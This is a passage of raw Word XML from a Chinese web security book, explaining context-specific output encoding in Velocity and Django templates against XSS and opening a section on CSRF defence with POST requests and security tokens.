                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>....</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="23"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="143"/>
        <w:ind w:left="102" w:right="223" w:firstLine="521"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:77.390007pt;width:411.15pt;height:51.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4360;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="192" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>XML</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>编码输出，将会执行 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>XML Encode</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>输出</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="22"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#SXML($xml)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="268" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="4606" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>JS</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>编码输出，将会执行</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>JavaScript Encode</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>输出</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#SJS($js)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-23"/>
        </w:rPr>
        <w:t>但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Velocity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>提供的处理机制，与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-23"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auto-escape </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>所提供的机制是类似的，都只进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>HtmlEncode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>，而未细分编码使用的具体场景。不过幸运的是，在模板引擎中，可以实现自定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>义的编码函数，应用于不同场景。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>中是使用自定义 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Velocity </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中则可以使用“宏”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(velocimacro)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="187" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>通过自定义的方法，使得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>防御的功能得到完善；同时在模板系统中，搜索不安全的变量也有了依据，甚至在代码检测工具中，可以自动判断出需要使用哪一种安全的编码方法， 这在安全开发流程中是非常重要的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在其他的模板引擎中，也可以依据“是否有细分场景使用不同的编码方式”来判断 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>的安全方案是否完整。在很多 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架官方文档中推荐的用法，就是存在缺陷的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>的开发者在设计安全方案时，有时会缺乏来自安全专家的建议。所以开发者在使用框架时，应该慎重对待安全问题，不可盲从官方指导文档。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
          <w:tab w:pos="1061" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="117" w:after="0"/>
        <w:ind w:left="1060" w:right="0" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:bookmarkStart w:name="12.3  Web框架与CSRF防御" w:id="72"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>b </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>框架与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="301"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>关于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的攻击原理和防御方案，在本书“跨站点请求伪造”一章中有所阐述。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="73"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>框架中可以使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>security token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>解决 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>攻击的目标，一般都会产生“写数据”操作的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-34"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，比如“增”、“删”、“改”；而</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="202" w:right="223" w:hanging="101"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>“读数据”操作并不是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>攻击的目标，因为在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的攻击过程中攻击者无法获取到服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>器端返回的数据，攻击者只是借用户之手触发服务器动作，所以读数据对于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>来说并无直接的意义（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>但是如果同时存在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>漏洞或者其他的跨域漏洞，则可能会引起别的问题，在这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>里，仅仅就 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>对抗本身进行讨论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="102" w:right="223" w:firstLine="501"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>因此，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>应用开发中，有必要对“读操作”和“写操作”予以区分，比如要求所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>“写操作”都使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>在很多讲述 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>防御的文章中，都要求使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>进行防御，但实际上 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>身并不足以对抗 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>，因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>也是可以自动提交的。但是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>的使用，对于保护 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>有着积极的意义，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>的私密性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>不可预测性原则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，是防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
